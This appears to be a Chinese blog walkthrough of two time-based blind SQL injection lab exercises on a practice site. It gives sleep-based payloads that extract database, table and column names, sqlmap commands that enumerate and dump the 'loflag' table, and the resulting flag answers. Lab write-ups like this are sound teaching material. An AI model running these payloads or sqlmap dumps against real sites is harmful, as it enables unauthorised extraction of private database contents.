这篇博客详细描述了如何通过SQL注入技术获取数据库信息的过程,包括确定库名、表名和字段名。首先,利用ASCII比较和睡眠函数进行二分法缩小范围,手动或使用sqlmap工具来探测数据库、表和字段。最终,揭示了特定数据库kanwolongxia中的表loflag的字段time-hj作为关键信息。
1.跑库名
select *from news where id=”1” and if((ascii(substr((database()),1,1))>97),sleep(5),6)— qwe
如果手注,用二分法缩小范围。
用sqlmap跑:
python sqlmap.py -u http://inject2.lab.aqlab.cn/Pass-13/index.php?id=1 —dbs —level 3 -risk 2
跑出来6个库:
error
head_error
information_schema
kanwolongxia
post_error
widechar
select *from news where id=”1” and if(database()=’kanwolongxia’,sleep(5),6)— qwe
页面延迟5秒以上,说明库名为 kanwolongxia
2.跑表名
select *from news where id=”1” and if((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97),sleep(5),6)— qwe
如果手注,用二分法缩小范围。
跑其余表用limit
用sqlmap跑:
python sqlmap.py -u http://inject2.lab.aqlab.cn/Pass-13/index.php?id=1 -D kanwolongxia —tables —level 3 -risk 2
跑出三个表:
user
loflag
news
用select *from news where id=”1” and if((select table_name from information_schema.tables where table_schema=database() limit 0,1)=’loflag’,sleep(5),6)— qwe
确认表名为loflag
3.跑字段名
select *from news where id=”1” and if((ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name=’loflag’ limit 0,1),1,1))>97),sleep(5),6)— qwe
如果手注,用二分法缩小范围。
跑其余字段用limit
用sqlmap跑:
python sqlmap.py -u http://inject2.lab.aqlab.cn/Pass-13/index.php?id=1 -T loflag —dump —level 3 -risk 2
跑出:
zKaQ-QQQ
zKaQ-RD
zKaQ-Moren
zKaQ-time-hj(这道题的答案)
zKaQ-time-zxxz
延时注入(二)
1.跑库名
select *from news where id=(‘1’) and if((ascii(substr((database()),1,1))>97),sleep(5),6)— qwe
如果手注,用二分法缩小范围。
用sqlmap跑:
python sqlmap.py -u http://inject2.lab.aqlab.cn/Pass-13/index.php?id=1 —dbs —level 3 -risk 2
跑出来6个库:
error
head_error
information_schema
kanwolongxia
post_error
widechar
select *from news where id=(‘1’) and if(database()=’kanwolongxia’,sleep(5),6)— qwe
页面延迟5秒以上,说明库名为 kanwolongxia
2.跑表名
select *from news where id=(‘1’) and if((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97),sleep(5),6)— qwe
如果手注,用二分法缩小范围。
跑其余表用limit
用sqlmap跑:
python sqlmap.py -u http://inject2.lab.aqlab.cn/Pass-13/index.php?id=1 -D kanwolongxia —tables —level 3 -risk 2
跑出三个表:
user
loflag
news
select *from news where id=(‘1’) and if((select table_name from information_schema.tables where table_schema=database() limit 0,1)=’loflag’,sleep(5),6)— qwe
3.跑字段名
select *from news where id=(‘1’)and if((ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name=’loflag’ limit 0,1),1,1))>97),sleep(5),6)— qwe
如果手注,用二分法缩小范围。
跑其余字段用limit
用sqlmap跑:
python sqlmap.py -u http://inject2.lab.aqlab.cn/Pass-13/index.php?id=1 -T loflag —dump —level 3 -risk 2
跑出:
zKaQ-QQQ
zKaQ-RD
zKaQ-Moren
zKaQ-time-hj
zKaQ-time-zxxz(这道题的答案)
扫一扫
1428
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
